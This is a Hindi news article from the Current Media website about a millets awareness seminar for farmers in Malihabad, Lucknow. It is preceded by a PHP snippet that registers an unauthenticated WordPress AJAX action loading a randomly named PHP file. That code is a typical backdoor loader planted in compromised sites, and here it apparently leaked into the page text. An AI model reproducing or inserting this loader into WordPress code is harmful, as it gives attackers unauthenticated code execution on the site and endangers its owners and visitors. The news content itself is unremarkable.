if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }विकास खण्डस्तरीय किसान जागरूकता गोष्ठी आयोजित - Current Media

विकास खण्डस्तरीय किसान जागरूकता गोष्ठी आयोजित

मलिहाबाद/लखनऊ। शहज़ाद अहमद खान। मिलेट्स पुनरोद्धार योजनांतर्गत विकास खण्डस्तरीय किसान गोष्ठी का आयोजन ब्लाक सभागार में कृषि विभाग द्वारा किया गया। जिसमें मोटे अनाज के महत्व पर विशेष चर्चा करते हुए उनके प्रयोग करने की बात ब्लाक प्रमुख निर्मल वर्मा ने कही।
ब्लाक सभागार में आयोजित गोष्ठी को संबोधित करते हुए ब्लाक प्रमुख निर्मल वर्मा ने कहा कि मोटा अनाज ज्वार, बाजरा, रागी, कंगनी व कुटकी सेहत के लिये फायदेमंद हैं। इन मोटे अनाजों में पोषक तत्व अधिक होते है। इसलिये लोगों को इसकी खेती करने के साथ इनका खाने में भी प्रयोग करना चाहिये। सहायक विकास अधिकारी कृषि मानवेन्द्र सिंह ने किसानों को बताया कि यह अनाज कम पानी में भी उपजाए जा सकते है। उन्होंने किसानों को किसान सम्मान निधि, फसल बीमा योजना, प्राकृतिक खेती योजना सहित मिलेट्स (मोटे अनाज) के उत्पाद पर बढ़ावा देने वाली अन्य योजनाओं की विस्तृत जानकारी दी। गोष्ठी में 101 कृषकों ने भाग लिया। किसानों को सूक्ष्म भोजन के साथ कृषि संबंधी प्रसार सामग्री वितरित की गयीं। गोष्ठी में प्रमुख रूप से प्रधान संघ अध्यक्ष प्र. अखिलेश उर्फ अंजू सिंह, प्रगतिशील किसान गिरिजाशंकर मौर्य, समस्त एग्रीकल्चर टेक्नोलाजी मैनेजमेंट (एटीएम), प्राविधिक सहायक सहित फसल बीमा योजना के प्रतिनिधि मौजूद रहे।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

संयुक्त राष्ट्र सतत विकास लक्ष्यों में उत्कृष्ट योगदान के लिए ‘वायरसडीज़ीज़’ जर्नल सम्मानित

लखनऊ। मो0 ज़ाहिद । स्प्रिंगर नेचर द्वारा प्रकाशित अंतरराष्ट्रीय पीयर-रिव्यूड जर्नल इंडियान वायरोलॉजिकल सोसाइटी केे …